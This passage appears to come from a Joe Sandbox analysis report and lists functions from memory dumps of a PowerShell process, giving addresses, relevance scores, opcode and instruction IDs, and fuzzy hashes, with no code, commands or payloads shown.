                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9baf0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bca1ce95619fe8108766e953cbfaf5e2fee68e791a24b54583ddee79cd1299aa
                                                                                                    • Instruction ID: 6eb8a954d3cb8d6c96a4031c02415d497558d6e9581469ee38fe381562228645
                                                                                                    • Opcode Fuzzy Hash: bca1ce95619fe8108766e953cbfaf5e2fee68e791a24b54583ddee79cd1299aa
                                                                                                    • Instruction Fuzzy Hash: 04F1C331B0DA894FEBA9EB288865AA47BE1EF65300F1900F9D05DC71D3DE35AD46C741
                                                                                                    Function 00007FFD9B897906 Relevance: .3, Instructions: 327COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f4c4bacdb0a93141c48de320800dc197c75c77eba2ac34cb199a3ec17296ad7d
                                                                                                    • Instruction ID: ac76b49a01e6b2fce9882ef7026bc0dff4168f2b2d5f8f320434b0fce496862f
                                                                                                    • Opcode Fuzzy Hash: f4c4bacdb0a93141c48de320800dc197c75c77eba2ac34cb199a3ec17296ad7d
                                                                                                    • Instruction Fuzzy Hash: CCB1B570609A4D8FEF68DF28D8557E93BE1FF59310F14426AE84DC7291CB7499418B82
                                                                                                    Function 00007FFD9B76E620 Relevance: .1, Instructions: 125COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799206719.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b76d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e2edf21a6c22879d14c8d2ec8f38328e7fee8683ef4cca854d03d14841a61552
                                                                                                    • Instruction ID: 072d05ca9e286a723e209646c80d1692ee54a213df8a9c4fefb6ca6047e8326f
                                                                                                    • Opcode Fuzzy Hash: e2edf21a6c22879d14c8d2ec8f38328e7fee8683ef4cca854d03d14841a61552
                                                                                                    • Instruction Fuzzy Hash: 7541267140EBC48FE7668B29D8559523FF0EF56320B1606DFD089CB1A3D625A846C7A3
                                                                                                    Function 00007FFD9B89152C Relevance: .1, Instructions: 119COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a0af76d11365f986cc9ae94e065c49a1de40eb8797c410893dffcba00d011314
                                                                                                    • Instruction ID: 4cca51648a9261910364467800702ae70df6db02ab2308e0e84ed5184b8d622b
                                                                                                    • Opcode Fuzzy Hash: a0af76d11365f986cc9ae94e065c49a1de40eb8797c410893dffcba00d011314
                                                                                                    • Instruction Fuzzy Hash: 2B31847191CB4C9FDB189B5CD8466A97BE0FB99321F00422FE449D3651DB70A8568BC2
                                                                                                    Function 00007FFD9B891DA8 Relevance: .1, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b007694405a1fd205b2187ce545653f1e8abfc87c455c8ad7e7d8056f770c1af
                                                                                                    • Instruction ID: 3b86d4619cd59c3a6e735242490a901b25709d3405361152d6671d64556c3ce0
                                                                                                    • Opcode Fuzzy Hash: b007694405a1fd205b2187ce545653f1e8abfc87c455c8ad7e7d8056f770c1af
                                                                                                    • Instruction Fuzzy Hash: 7C21073090C60C8FEF58DF9CD84A7E97BE0EB96321F00426BD449C3152D674A44ACB91
                                                                                                    Function 00007FFD9B897404 Relevance: .1, Instructions: 92COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 14a73556186092edbf9f895b61d3f20ad248b9bd7309fed94865261e39e4fc1d
                                                                                                    • Instruction ID: 6e6e0f821f595f68e3be2af4b2f4b0ca6e189ce3eac30ea135acc4ba58ca630a
                                                                                                    • Opcode Fuzzy Hash: 14a73556186092edbf9f895b61d3f20ad248b9bd7309fed94865261e39e4fc1d
                                                                                                    • Instruction Fuzzy Hash: 35311E34A1D64E8EFBB4AF65CC15BF93A90FF49719F410139D44D860A3CB386A45CB11
                                                                                                    Function 00007FFD9B885975 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4e297127774ec4456dfa6b61b2674fa10904ac3f72191b1f8fc84c0d9b1e4899
                                                                                                    • Instruction ID: eb4d8113da7701195aac9e177f25a7f4c218417092df201e75336c2391d23ea5
                                                                                                    • Opcode Fuzzy Hash: 4e297127774ec4456dfa6b61b2674fa10904ac3f72191b1f8fc84c0d9b1e4899
                                                                                                    • Instruction Fuzzy Hash: 4201A73020CB0C4FD748EF0CE451AA5B7E0FB89360F10056EE58AC36A1D632E881CB41
                                                                                                    Function 00007FFD9BB31C6C Relevance: .0, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1803079395.00007FFD9BB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB30000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bb30000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4ef1e89386827d2fe6092d1edc41acedf5cd9f098daf255974e3bed766105237
                                                                                                    • Instruction ID: d7c7e6df2a56b63a8414a6602824a8815e57b7cf2f5e92d8365c62fbcd59411f
                                                                                                    • Opcode Fuzzy Hash: 4ef1e89386827d2fe6092d1edc41acedf5cd9f098daf255974e3bed766105237
                                                                                                    • Instruction Fuzzy Hash: 31F06232A0E6494FD769EA5CE4618A477E0FF06324B1900B6E05CCB5BBDA25AC45C754
                                                                                                    Function 00007FFD9B891BF0 Relevance: .0, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 205224a3054d39dda56c737a26e02bc252605e68b33294292c2554de281bc902
                                                                                                    • Instruction ID: 79e01daa0c0224b34189a756adc7f7e1e5b06a871eb9732e88691cd0981c9bcf
                                                                                                    • Opcode Fuzzy Hash: 205224a3054d39dda56c737a26e02bc252605e68b33294292c2554de281bc902
                                                                                                    • Instruction Fuzzy Hash: 2FF0247080D68D8FDF16EF28881A4D87FA0FF16311B05029BE459C71B2DF64A554CBC2

                                                                                                    Non-executed Functions

                                                                                                    Function 00007FFD9B890FF2 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4N_^
                                                                                                    • API String ID: 0-2516135240
                                                                                                    • Opcode ID: cc842aac5aca1c96dcc44c21abd151324b015255127f413332262da38e59559c
                                                                                                    • Instruction ID: 168474ca8d349662bd40afc6998f5bd2c38f72aad953fe900558be51d1ffdc92
                                                                                                    • Opcode Fuzzy Hash: cc842aac5aca1c96dcc44c21abd151324b015255127f413332262da38e59559c
                                                                                                    • Instruction Fuzzy Hash: CEA16257B0E7E25FEB13A76CA8B55E67F60DF57268B0E00F7C0E58B093E904280A8351
                                                                                                    Function 00007FFD9B896A49 Relevance: .4, Instructions: 408COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 33975f8b8025ba681cb8cab4e66d7f517e69cc18b9dce471733dc3301caf7d85
                                                                                                    • Instruction ID: 5add56850de8d5f6068b6db993b500e46f9cf23f54f8d338461a094126384d68
                                                                                                    • Opcode Fuzzy Hash: 33975f8b8025ba681cb8cab4e66d7f517e69cc18b9dce471733dc3301caf7d85
                                                                                                    • Instruction Fuzzy Hash: 86D1C570A18A8D8FEFA8DF28C8557E97BD1FF58310F04426EE85DC7291CB74A9418782
                                                                                                    Function 00007FFD9B8984D3 Relevance: 5.1, Strings: 4, Instructions: 90COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1799675627.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: M_^$M_^$M_^$M_^
                                                                                                    • API String ID: 0-1397233021
                                                                                                    • Opcode ID: 6c16de06eb0586fc12cd8ebe1b81b266a43e94446d74b610462f04d51819e51c
                                                                                                    • Instruction ID: afaa5a08a22bd0d88f2b9028ec1232ebfcb30e2c9b0b9961f02f195a97f9d5cb
                                                                                                    • Opcode Fuzzy Hash: 6c16de06eb0586fc12cd8ebe1b81b266a43e94446d74b610462f04d51819e51c
                                                                                                    • Instruction Fuzzy Hash: BE21A293B0E6DA4BE317526C68BA0D53F90EE2626830B02F7D0D8CF1A3FC14994B4251